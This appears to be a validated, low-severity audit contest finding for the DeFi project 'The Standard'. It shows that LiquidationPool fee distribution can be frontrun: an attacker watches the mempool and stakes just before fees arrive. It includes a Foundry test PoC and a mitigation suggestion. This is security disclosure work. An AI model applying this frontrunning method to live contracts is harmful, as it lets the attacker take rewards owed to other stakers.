The Standard

DeFiHardhat

20,000 USDC

View results

Previous Next

Submission Details

Severity: low

Valid

Fees distribution in LiquidationPool is vulnerable to frontrunning

0xbtk

Overview

LiquidationPool fees distribution is vulnerable to frontrunning attacks

Impact

An attacker can stake in the last minute and rip all the rewards.

Proof of Concept

Attack steps:

Attacker will monitor the mempool and wait for LiquidationPoolManager receives funds
Frontrun with increasePosition() with a high stake to rip most of the rewards.

Here is a coded PoC to demonstrate the issue:

function testSandwichFees() public {

address pool = liquidationPoolManager.pool();

// Bob is monitoring the mempool checking if funds are going

// to be transferred to pool manager

TST.mint(bob, 10000e18);

vm.prank(bob);

TST.approve(pool, 10000e18);

initPosition(alice, 100e18, 90e18);

initPosition(jim, 100e18, 90e18);

vm.warp(block.timestamp + 10 days);

// Bob spotted that pool manager is going to receive funds

// frontrun with increasePosition

vm.prank(bob);

LiquidationPool(pool).increasePosition(10000e18, 0);

EUROS.mint(address(liquidationPoolManager), 1000e18);

vm.prank(bob);

liquidationPoolManager.distributeFees();

// Alice will receive : 4901960784313725490 [4.901e18] EUROs

// Jim will receive : 4901960784313725490 [4.901e18] EUROs

// Bob will receive : 490196078431372549019 [4.901e20] EUROs

// Bob now will wait 1 day and withdraw his funds successfully

}

Test Setup:

Incorporate this gist in the tests folder.
Execute: forge test --mt testSandwichFees -vvv

Tools Used

Manual review

Recommended Mitigation Steps

Implement a mechanism to distribute rewards linearly to prevent such attacks.

Updates

Lead Judging Commences

hrishibhat Lead Judge almost 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

frontrun-distrubutefees

hrishibhat Lead Judge almost 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

frontrun-feedist-low

Prize pool breakdown

Total prize

20,000 USDC

nSLOC

609

33 USDC / LOC

High Medium

17,500 USDC

Low

2,500 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!